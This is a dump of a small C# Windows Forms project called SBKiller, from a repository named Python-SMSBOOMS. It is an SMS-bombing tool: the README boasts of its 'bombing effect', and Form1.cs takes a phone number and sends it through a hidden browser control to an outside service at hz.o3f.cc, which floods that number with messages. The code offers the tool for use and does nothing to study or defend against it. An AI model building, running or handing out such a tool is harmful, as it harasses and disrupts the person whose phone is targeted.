├── README.md
├── SBKiller.exe
└── SBKiller
├── SBKiller.sln
├── SBKiller.v12.suo
└── SBKiller
├── App.config
├── Form1.Designer.cs
├── Form1.cs
├── Form1.resx
├── Program.cs
├── Properties
├── AssemblyInfo.cs
├── Resources.Designer.cs
├── Resources.resx
├── Settings.Designer.cs
└── Settings.settings
├── SBKiller.csproj
├── SBKiller.csproj.user
├── bin
└── Debug
│ ├── SBKiller.vshost.exe
│ └── SBKiller.vshost.exe.config
├── obj
└── Debug
│ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs
│ ├── DesignTimeResolveAssemblyReferences.cache
│ ├── DesignTimeResolveAssemblyReferencesInput.cache
│ ├── SBKiller.csproj.AssemblyReference.cache
│ ├── SBKiller.csproj.CoreCompileInputs.cache
│ ├── SBKiller.csproj.FileListAbsolute.txt
│ ├── TempPE
│ └── Properties.Resources.Designer.cs.dll
│ ├── TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs
│ ├── TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs
│ └── TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs
└── 睿智的唯物主义者.ico
/README.md:
--------------------------------------------------------------------------------
1 | "# Python-SMSBOOMS"
2 | 接入第三方平台,轰炸效果较好
3 |
--------------------------------------------------------------------------------
/SBKiller.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WiseMaterialismer/Python-SMSBOOMS/7ba6201e94de47a5d82a50accde793e8929843ba/SBKiller.exe
--------------------------------------------------------------------------------
/SBKiller/SBKiller.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.31105.61
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SBKiller", "SBKiller\SBKiller.csproj", "{987B3207-BBDD-4EDF-BCD6-495D0B0E4D88}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {987B3207-BBDD-4EDF-BCD6-495D0B0E4D88}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {987B3207-BBDD-4EDF-BCD6-495D0B0E4D88}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {987B3207-BBDD-4EDF-BCD6-495D0B0E4D88}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {987B3207-BBDD-4EDF-BCD6-495D0B0E4D88}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {26F1077D-4451-43F2-97F8-F818F5C10A2E}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller.v12.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WiseMaterialismer/Python-SMSBOOMS/7ba6201e94de47a5d82a50accde793e8929843ba/SBKiller/SBKiller.v12.suo
--------------------------------------------------------------------------------
/SBKiller/SBKiller/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/Form1.Designer.cs:
--------------------------------------------------------------------------------
1 |
2 | namespace SBKiller
3 | {
4 | partial class Form1
5 | {
6 | ///
7 | /// 必需的设计器变量。
8 | ///
9 | private System.ComponentModel.IContainer components = null;
10 |
11 | ///
12 | /// 清理所有正在使用的资源。
13 | ///
14 | /// 如果应释放托管资源,为 true;否则为 false。
15 | protected override void Dispose(bool disposing)
16 | {
17 | if (disposing && (components != null))
18 | {
19 | components.Dispose();
20 | }
21 | base.Dispose(disposing);
22 | }
23 |
24 | #region Windows 窗体设计器生成的代码
25 |
26 | ///
27 | /// 设计器支持所需的方法 - 不要修改
28 | /// 使用代码编辑器修改此方法的内容。
29 | ///
30 | private void InitializeComponent()
31 | {
32 | System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form1));
33 | this.label4 = new System.Windows.Forms.Label();
34 | this.webBrowser1 = new System.Windows.Forms.WebBrowser();
35 | this.label6 = new System.Windows.Forms.Label();
36 | this.label5 = new System.Windows.Forms.Label();
37 | this.button3 = new System.Windows.Forms.Button();
38 | this.textBox3 = new System.Windows.Forms.TextBox();
39 | this.panel2 = new System.Windows.Forms.Panel();
40 | this.panel2.SuspendLayout();
41 | this.SuspendLayout();
42 | //
43 | // label4
44 | //
45 | this.label4.AutoSize = true;
46 | this.label4.Location = new System.Drawing.Point(10, 9);
47 | this.label4.Name = "label4";
48 | this.label4.Size = new System.Drawing.Size(53, 12);
49 | this.label4.TabIndex = 7;
50 | this.label4.Text = "短信轰炸";
51 | //
52 | // webBrowser1
53 | //
54 | this.webBrowser1.Location = new System.Drawing.Point(135, 3);
55 | this.webBrowser1.MinimumSize = new System.Drawing.Size(20, 20);
56 | this.webBrowser1.Name = "webBrowser1";
57 | this.webBrowser1.ScriptErrorsSuppressed = true;
58 | this.webBrowser1.Size = new System.Drawing.Size(141, 20);
59 | this.webBrowser1.TabIndex = 8;
60 | this.webBrowser1.Visible = false;
61 | //
62 | // label6
63 | //
64 | this.label6.AutoSize = true;
65 | this.label6.ForeColor = System.Drawing.Color.Red;
66 | this.label6.Location = new System.Drawing.Point(10, 193);
67 | this.label6.Name = "label6";
68 | this.label6.Size = new System.Drawing.Size(0, 12);
69 | this.label6.TabIndex = 11;
70 | //
71 | // label5
72 | //
73 | this.label5.AutoSize = true;
74 | this.label5.Location = new System.Drawing.Point(4, 15);
75 | this.label5.Name = "label5";
76 | this.label5.Size = new System.Drawing.Size(53, 12);
77 | this.label5.TabIndex = 1;
78 | this.label5.Text = "手机号:";
79 | //
80 | // button3
81 | //
82 | this.button3.Location = new System.Drawing.Point(246, 12);
83 | this.button3.Name = "button3";
84 | this.button3.Size = new System.Drawing.Size(142, 23);
85 | this.button3.TabIndex = 2;
86 | this.button3.Text = "开始轰炸";
87 | this.button3.UseVisualStyleBackColor = true;
88 | this.button3.Click += new System.EventHandler(this.button3_Click);
89 | //
90 | // textBox3
91 | //
92 | this.textBox3.Location = new System.Drawing.Point(62, 12);
93 | this.textBox3.Name = "textBox3";
94 | this.textBox3.Size = new System.Drawing.Size(178, 21);
95 | this.textBox3.TabIndex = 3;
96 | this.textBox3.KeyDown += new System.Windows.Forms.KeyEventHandler(this.textBox3_KeyDown_1);
97 | //
98 | // panel2
99 | //
100 | this.panel2.BorderStyle = System.Windows.Forms.BorderStyle.FixedSingle;
101 | this.panel2.Controls.Add(this.textBox3);
102 | this.panel2.Controls.Add(this.button3);
103 | this.panel2.Controls.Add(this.label5);
104 | this.panel2.Location = new System.Drawing.Point(12, 29);
105 | this.panel2.Name = "panel2";
106 | this.panel2.Size = new System.Drawing.Size(396, 47);
107 | this.panel2.TabIndex = 6;
108 | //
109 | // Form1
110 | //
111 | this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F);
112 | this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
113 | this.ClientSize = new System.Drawing.Size(409, 77);
114 | this.Controls.Add(this.label6);
115 | this.Controls.Add(this.webBrowser1);
116 | this.Controls.Add(this.label4);
117 | this.Controls.Add(this.panel2);
118 | this.FormBorderStyle = System.Windows.Forms.FormBorderStyle.Fixed3D;
119 | this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
120 | this.MaximizeBox = false;
121 | this.Name = "Form1";
122 | this.Tag = "";
123 | this.Text = "SBKiller";
124 | this.panel2.ResumeLayout(false);
125 | this.panel2.PerformLayout();
126 | this.ResumeLayout(false);
127 | this.PerformLayout();
128 |
129 | }
130 |
131 | #endregion
132 |
133 | private System.Windows.Forms.Label label4;
134 | private System.Windows.Forms.WebBrowser webBrowser1;
135 | private System.Windows.Forms.Label label6;
136 | private System.Windows.Forms.Label label5;
137 | private System.Windows.Forms.Button button3;
138 | private System.Windows.Forms.TextBox textBox3;
139 | private System.Windows.Forms.Panel panel2;
140 | }
141 | }
142 |
143 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/Form1.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 | using System.Windows.Forms;
4 |
5 | namespace SBKiller
6 | {
7 | public partial class Form1 : Form
8 | {
9 | public Form1()
10 | {
11 | InitializeComponent();
12 | }
13 | private void button3_Click(object sender, EventArgs e)
14 | {
15 | string phone = textBox3.Text;
16 | bool isNumber = IsNumber(phone);
17 | if (button3.Text == @"开始轰炸")
18 | {
19 | if (isNumber == false && phone.Length != 11 )
20 | {
21 | MessageBox.Show(@"W请输入正确的手机号!", @"提示", MessageBoxButtons.OK, MessageBoxIcon.Information);
22 | }
23 | else
24 | {
25 | webBrowser1.Navigate(string.Format("http://hz.o3f.cc/index.php?hm={0}&ok=",phone));
26 | button3.Text = @"停止轰炸";
27 | textBox3.ReadOnly = true;
28 | MessageBox.Show(@"正在对" + phone + @"进行轰炸!", @"提示", MessageBoxButtons.OK, MessageBoxIcon.Information);
29 | }
30 | }
31 | else
32 | {
33 | webBrowser1.Navigate("");
34 | textBox3.ReadOnly = false;
35 | button3.Text = @"开始轰炸";
36 | }
37 | }
38 | public static bool IsNumber(string str)
39 | {
40 | if (str == null || str.Length == 0)
41 | return false;
42 | ASCIIEncoding ascii = new ASCIIEncoding();
43 | byte[] bytestr = ascii.GetBytes(str);
44 |
45 | foreach (byte c in bytestr)
46 | {
47 | if (c < 48 || c > 57)
48 | {
49 | return false;
50 | }
51 | }
52 | return true;
53 | }
54 |
55 | private void textBox3_KeyDown_1(object sender, KeyEventArgs e)
56 | {
57 | if (e.KeyCode == Keys.Enter)
58 | {
59 | button3_Click(sender, e);
60 | }
61 | }
62 | }
63 | }
64 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/Form1.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 |
122 |
123 | AAABAAEAEBAAAAEAGABoAwAAFgAAACgAAAAQAAAAIAAAAAEAGAAAAAAAAAAAAMQOAADEDgAAAAAAAAAA
124 | AAAdGxMbHRcYHBYfJSAaHhkdIRwdIx4aGxIVEwsWEwsZFg4WFAwXFQ0XFQ0UEwkUEgoXFQ0ZGxUSFhAc
125 | Ih0SFhEaHhkiKCMXGA8YFg4WEwsWEwsVEwsUEgoUEgoUFQsXFgwaGBAgIBoXFxEhIh4VGBYWGRcpLCo2
126 | OzkOEgwMDgIVEwgYEgcTEQkOEQgNDQcPDwkTFg0XGhEeIRgeIBoeJB8ZIh8lLSw5QUEnLisXHhcRFAsU
127 | EgoODQMQEgYPEgkMDwYZFBEfGxYgHRUcGRQrMzMsOD47SlM9UFg6S1RBUVgzQUcjLzMTFg0PDgAQEQcQ
128 | EQcbHBoaGxcWGRcbIB4/T1ZMYm5feIhddINTaXVkd4RTZ3I+UVkbISAYGxIPEAcSEAgzOjUzPDktOjgu
129 | QEFqhpFsjp50mKqbuMdcdYVsg5J9lKNrhZM8TFIbJCchJCIODwsRFg0xODNATExPYmd/nKqXuMigwdS4
130 | 1udwipqDmqmJorKeustcc4JAUFw1QUMbJSUaFgsVEwsqLy4rNz05TV6yyty60uS21+ebtcVLYnGGn6+8
131 | 2uuRrMB8kqR7jpNBUlUdHBghHhkdGhImJBwxPT9IXWW51OKqxNRJYGhEVldDVFeSo7CNrcR3nLCJpLJf
132 | eYUWFw4TEggcGhAlJBotNTREUFREVl2To6lPXFpKUktHT0hJU1NVaHBXbXNPXWMnNTsaHBAaHBAZGA4m
133 | JRsvMy5BRkRESkl5gYFMUk1DRztFST1ARD4mLSogJyIdGhYYFREbGQ8gHhYZGRMjJyItMy4sMyxMVEpK
134 | VFtPWFtBSUgwOTYrNDExMjAqJyMdFxAeGBEXEw4YFA8hIBwjJCIqMSw1PDdSXVV4gICQlpVNUlA/RUAl
135 | LCUiIBgaFA0VEg4VEg0UEQwTEAsfHBcjIx0oLCcvNTAzOjVGTUheZF84OTUoKiQrLiUfHRUWEg0aEQ4X
136 | EQwODwYWFAwWFAwkIRkfHxkpKiYiJSM1Pzk2PTojJiQlKCYnKyYQFA8QDg0REQsLDQcAAAAAAAAAAAAA
137 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
138 |
139 |
140 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Threading.Tasks;
5 | using System.Windows.Forms;
6 |
7 | namespace SBKiller
8 | {
9 | static class Program
10 | {
11 | ///
12 | /// 应用程序的主入口点。
13 | ///
14 | [STAThread]
15 | static void Main()
16 | {
17 | Application.EnableVisualStyles();
18 | Application.SetCompatibleTextRenderingDefault(false);
19 | Application.Run(new Form1());
20 | }
21 | }
22 | }
23 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // 有关程序集的一般信息由以下
6 | // 控制。更改这些特性值可修改
7 | // 与程序集关联的信息。
8 | [assembly: AssemblyTitle("SBKiller")]
9 | [assembly: AssemblyDescription("SBKiller")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("BombThreads网络安全")]
12 | [assembly: AssemblyProduct("SBKiller")]
13 | [assembly: AssemblyCopyright("Copyright © 2021 Thrower")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // 将 ComVisible 设置为 false 会使此程序集中的类型
18 | //对 COM 组件不可见。如果需要从 COM 访问此程序集中的类型
19 | //请将此类型的 ComVisible 特性设置为 true。
20 | [assembly: ComVisible(false)]
21 |
22 | // 如果此项目向 COM 公开,则下列 GUID 用于类型库的 ID
23 | [assembly: Guid("987b3207-bbdd-4edf-bcd6-495d0b0e4d88")]
24 |
25 | // 程序集的版本信息由下列四个值组成:
26 | //
27 | // 主版本
28 | // 次版本
29 | // 生成号
30 | // 修订号
31 | //
32 | //可以指定所有这些值,也可以使用“生成号”和“修订号”的默认值
33 | //通过使用 "*",如下所示:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // 此代码由工具生成。
4 | // 运行时版本:4.0.30319.42000
5 | //
6 | // 对此文件的更改可能会导致不正确的行为,并且如果
7 | // 重新生成代码,这些更改将会丢失。
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace SBKiller.Properties {
12 | using System;
13 |
14 |
15 | ///
16 | /// 一个强类型的资源类,用于查找本地化的字符串等。
17 | ///
18 | // 此类是由 StronglyTypedResourceBuilder
19 | // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。
20 | // 若要添加或移除成员,请编辑 .ResX 文件,然后重新运行 ResGen
21 | // (以 /str 作为命令选项),或重新生成 VS 项目。
22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 | internal class Resources {
26 |
27 | private static global::System.Resources.ResourceManager resourceMan;
28 |
29 | private static global::System.Globalization.CultureInfo resourceCulture;
30 |
31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
32 | internal Resources() {
33 | }
34 |
35 | ///
36 | /// 返回此类使用的缓存的 ResourceManager 实例。
37 | ///
38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
39 | internal static global::System.Resources.ResourceManager ResourceManager {
40 | get {
41 | if (object.ReferenceEquals(resourceMan, null)) {
42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("SBKiller.Properties.Resources", typeof(Resources).Assembly);
43 | resourceMan = temp;
44 | }
45 | return resourceMan;
46 | }
47 | }
48 |
49 | ///
50 | /// 使用此强类型资源类,为所有资源查找
51 | /// 重写当前线程的 CurrentUICulture 属性。
52 | ///
53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
54 | internal static global::System.Globalization.CultureInfo Culture {
55 | get {
56 | return resourceCulture;
57 | }
58 | set {
59 | resourceCulture = value;
60 | }
61 | }
62 | }
63 | }
64 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/Properties/Resources.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
121 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // 此代码由工具生成。
4 | // 运行时版本:4.0.30319.42000
5 | //
6 | // 对此文件的更改可能会导致不正确的行为,并且如果
7 | // 重新生成代码,这些更改将会丢失。
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace SBKiller.Properties {
12 |
13 |
14 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
15 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "12.0.0.0")]
16 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase {
17 |
18 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
19 |
20 | public static Settings Default {
21 | get {
22 | return defaultInstance;
23 | }
24 | }
25 | }
26 | }
27 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/SBKiller.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {987B3207-BBDD-4EDF-BCD6-495D0B0E4D88}
8 | WinExe
9 | SBKiller
10 | SBKiller
11 | v4.5
12 | 512
13 | true
14 | true
15 |
16 |
17 |
18 | AnyCPU
19 | true
20 | full
21 | false
22 | bin\Debug\
23 | DEBUG;TRACE
24 | prompt
25 | 4
26 |
27 |
28 | AnyCPU
29 | pdbonly
30 | true
31 | bin\Release\
32 | TRACE
33 | prompt
34 | 4
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 | Form
56 |
57 |
58 | Form1.cs
59 |
60 |
61 |
62 |
63 | Form1.cs
64 |
65 |
66 | ResXFileCodeGenerator
67 | Resources.Designer.cs
68 | Designer
69 |
70 |
71 | True
72 | Resources.resx
73 | True
74 |
75 |
76 | SettingsSingleFileGenerator
77 | Settings.Designer.cs
78 |
79 |
80 | True
81 | Settings.settings
82 | True
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/SBKiller.csproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | ShowAllFiles
5 |
6 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/bin/Debug/SBKiller.vshost.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WiseMaterialismer/Python-SMSBOOMS/7ba6201e94de47a5d82a50accde793e8929843ba/SBKiller/SBKiller/bin/Debug/SBKiller.vshost.exe
--------------------------------------------------------------------------------
/SBKiller/SBKiller/bin/Debug/SBKiller.vshost.exe.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/obj/Debug/.NETFramework,Version=v4.7.2.AssemblyAttributes.cs:
--------------------------------------------------------------------------------
1 | //
2 | using System;
3 | using System.Reflection;
4 | [assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.7.2", FrameworkDisplayName = ".NET Framework 4.7.2")]
5 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/obj/Debug/DesignTimeResolveAssemblyReferences.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WiseMaterialismer/Python-SMSBOOMS/7ba6201e94de47a5d82a50accde793e8929843ba/SBKiller/SBKiller/obj/Debug/DesignTimeResolveAssemblyReferences.cache
--------------------------------------------------------------------------------
/SBKiller/SBKiller/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WiseMaterialismer/Python-SMSBOOMS/7ba6201e94de47a5d82a50accde793e8929843ba/SBKiller/SBKiller/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache
--------------------------------------------------------------------------------
/SBKiller/SBKiller/obj/Debug/SBKiller.csproj.AssemblyReference.cache:
--------------------------------------------------------------------------------
1 | MBRSC
--------------------------------------------------------------------------------
/SBKiller/SBKiller/obj/Debug/SBKiller.csproj.CoreCompileInputs.cache:
--------------------------------------------------------------------------------
1 | 8069502011d0681850e57a53d5a1673222f430a6
2 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/obj/Debug/SBKiller.csproj.FileListAbsolute.txt:
--------------------------------------------------------------------------------
1 | C:\Users\Administrator\source\repos\SBKiller\SBKiller\obj\Debug\SBKiller.Form1.resources
2 | C:\Users\Administrator\source\repos\SBKiller\SBKiller\obj\Debug\SBKiller.Properties.Resources.resources
3 | C:\Users\Administrator\source\repos\SBKiller\SBKiller\obj\Debug\SBKiller.csproj.GenerateResource.cache
4 | C:\Users\Administrator\source\repos\SBKiller\SBKiller\obj\Debug\SBKiller.csproj.CoreCompileInputs.cache
5 | C:\Users\Administrator\source\repos\SBKiller\SBKiller\bin\Debug\SBKiller.exe.config
6 | C:\Users\Administrator\source\repos\SBKiller\SBKiller\bin\Debug\SBKiller.exe
7 | C:\Users\Administrator\source\repos\SBKiller\SBKiller\bin\Debug\SBKiller.pdb
8 | C:\Users\Administrator\source\repos\SBKiller\SBKiller\obj\Debug\SBKiller.exe
9 | C:\Users\Administrator\source\repos\SBKiller\SBKiller\obj\Debug\SBKiller.pdb
10 | C:\Users\Administrator\source\repos\SBKiller\SBKiller\obj\Debug\SBKiller.csproj.AssemblyReference.cache
11 |
--------------------------------------------------------------------------------
/SBKiller/SBKiller/obj/Debug/TempPE/Properties.Resources.Designer.cs.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WiseMaterialismer/Python-SMSBOOMS/7ba6201e94de47a5d82a50accde793e8929843ba/SBKiller/SBKiller/obj/Debug/TempPE/Properties.Resources.Designer.cs.dll
--------------------------------------------------------------------------------
/SBKiller/SBKiller/obj/Debug/TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WiseMaterialismer/Python-SMSBOOMS/7ba6201e94de47a5d82a50accde793e8929843ba/SBKiller/SBKiller/obj/Debug/TemporaryGeneratedFile_036C0B5B-1481-4323-8D20-8F5ADCB23D92.cs
--------------------------------------------------------------------------------
/SBKiller/SBKiller/obj/Debug/TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WiseMaterialismer/Python-SMSBOOMS/7ba6201e94de47a5d82a50accde793e8929843ba/SBKiller/SBKiller/obj/Debug/TemporaryGeneratedFile_5937a670-0e60-4077-877b-f7221da3dda1.cs
--------------------------------------------------------------------------------
/SBKiller/SBKiller/obj/Debug/TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WiseMaterialismer/Python-SMSBOOMS/7ba6201e94de47a5d82a50accde793e8929843ba/SBKiller/SBKiller/obj/Debug/TemporaryGeneratedFile_E7A71F73-0F8D-4B9B-B56E-8E70B10BC5D3.cs
--------------------------------------------------------------------------------
/SBKiller/SBKiller/睿智的唯物主义者.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/WiseMaterialismer/Python-SMSBOOMS/7ba6201e94de47a5d82a50accde793e8929843ba/SBKiller/SBKiller/睿智的唯物主义者.ico
--------------------------------------------------------------------------------